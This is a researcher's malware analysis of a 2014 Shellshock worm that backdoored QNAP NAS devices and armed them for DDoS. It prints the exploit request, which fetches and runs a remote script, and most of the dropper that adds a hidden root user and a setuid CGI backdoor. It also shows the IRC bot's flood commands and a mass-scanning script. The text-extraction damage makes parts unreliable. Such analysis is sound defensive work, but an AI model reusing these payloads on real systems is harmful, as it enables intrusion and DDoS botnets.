A massive attack was revealed that exploited the Shellshock vulnerability in QNAP NAS devices. The attackers deployed a payload that patched the vulnerability, armed the devices for DDOS attacks, and installed a scanner to search for more vulnerable devices. Over 500 compromised devices were detected. The payload installed a backdoor that could control the armed devices for DDOS attacks through IRC commands.

1. “Armed Qnap-NAS Botnet Revealed”
We present findings in addition to the work in the following analyses.
Worm Backdoors and Secures QNAP Network Storage Devices
https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
Shellshock Worm Exploiting Unpatched QNAP NAS Devices
https://threatpost.com/shellshock-worm-exploiting-unpatched-qnap-nas-devices/109870
A little ShellShock fun
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
This is what we found, missing pieces from previous researches.
Like always our publication is short but right into point.
The attackers are sending a GET request with Shellshock
exploit to all IP ranges around the Internet. The
successfully hacked NAS devices are forced to download a
payload from Internet, this payload contains a SH script
with very clever design logic specially build for QNAP NAS
devices. The payload downloads the ELF Linux installer
package with BOT functionality for DDOS. From this point
the attacker is building persistence with autorun.sh script
inside the compromised NAS device.
Another interesting founding is that attacker is patching
the vulnerable device against the Shellshock vulnerability; by doing this attacker prevents other hackers to
own the already hacked NAS device.
Adding a “'request” user with root privileges into the “passwd” and “shadow” fileis classical approach to own
a Linux machine. The real aim of this massive hack is, at the script “armgH.cgi” that attacker is downloading
and installing into the compromised machine.
This CGI Backdoor prepares the NAS to become an armed device ready for DDOS.
The whole attack schematic is design to be continuous with auto pilot mode.
So far we managed to detect more than 500+ compromised devices.

2.  Massive Attack  Deploying Payload Patching against Shellshock (persistence)  Arming  Deploy the
scanner 
Details
Attack Exploit detected from our IDS devices.
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host:127.0.0.1
User-Agent:() { :;};/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c
http://xxx.14.xx.xx/S0.sh-P /tmp && /bin/sh/tmp/S0.sh0<&1 2>&1
500HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length:2250
Date:Sat, 13 Dec 2014 22:09:42 GMT
Server: header">HTTPStatus 404 - /cgi-bin/authLogin.cgi
Payload - Hosted in compromise server!
Massive
ShellShock
vulnerability
Attack
Deploy the
payload
Pathcing
against
ShellShock
Arming the
NAS for DDOS
attacks
Deploy the
scanner for
ShellShock
Attack

3. #!/bin/sh export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
unset HISTFIE ;unset REMOTEHOST ;unset SHISTORY ;unset BASHISTORY os=`uname -m` ip=xxx.14.xx.xx #wget -P/tmp/
http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ;chmod +x S0.sh ;shS0.sh # # fold=/share/MD0_DATA/optware/.xpl/if
[[ "$os" == 'armv5tel']];then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi cp
/home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi sleep 1
Search="request"
Files="/etc/passwd" if grep$Search $Files;then echo "$Search user its just added!"
else echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
#inst patch
wget -P/mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
#inst scan
sfolder="/share/HDB_DATA/.../" url69="http://xxx.14.xx.79/run"
Arming the NAS devices for DDOS attacks.
Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability.
Output from - Reverse engineering analyses.
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version ofbot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan<a> <b> <user> <passwd> - scanwithuser:pass (A.B)classes sets byyou
PRIVMSG %s :* .advscan<a> <b> - scan withd-linkconfigreset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scanlocal iprange withuser:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local iprange withd-linkconfig reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scanrandom iprange withuser:pass, (A.B)classes random
PRIVMSG %s :* .advscan->random - scanrandom iprange withd-linkconfig reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scanlocal iprange withuser:pass, A.(B)class random
PRIVMSG %s :* .advscan->random->b - scan local iprange withd-linkconfig reset bug
PRIVMSG %s :* .stop - stop current operation(scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE:<port> to 0 = randomports, <ip> to 0 = randomspoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where:*=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source addressipspoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (newgeneration)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngackflooder (new generation)
PRIVMSG %s :* *** IRCCommands:
PRIVMSG %s :* .setchan <channel> - set newmaster channel
PRIVMSG %s :* .join <channel> <password> - joinbot inselected room
PRIVMSG %s :* .part <channel> - part bot from selectedroom
PRIVMSG %s :* .quit - kill the current process

4. Senad Aruch
Senior Security Specialist
senad.aruc@gmail.com |www.senadaruc.com
March, 2014
Screenshot from hacked NAS device with deployed payload can be controlled via CGI web
backdoor
http://X.X.X.X:8080/cgi-bin/exo.cgi
Mass scanner for Shellshock
This script is taken from a compromised NAS device. Attacker is using “pscan” multi threaded
port scanner to search and hack for other vulnerable Qnap NAS devices.
#!/bin/sh
## xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url="" url="http://1xx.xx.xx.xx/S0.sh" download="/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p
/share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
nnn"
get="GET /cgi-bin/authLogin.cgi HTTP/1.1nHost: 127.0.0.1nUser-Agent: () { :; }; $download nnn"
./pnscan -rQDoc -w"$get "-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &
About the security researcher
Multiple Certified ISMS Professional with10-year background in: IT Security,IDS and
IPS, SIEM,SOC, NetworkForensics, Malware Analyses, ISMS and RISK, Ethical Hacking,
Vulnerability Management, Anti Fraud and Cyber Security. Skills include written and
verbal communications in 6 different languages.
Currently holding a Senior Security Specialist position at Reply s.p.a - Communication
Valley - Security Operations Center. Responsible foradvanced security operations.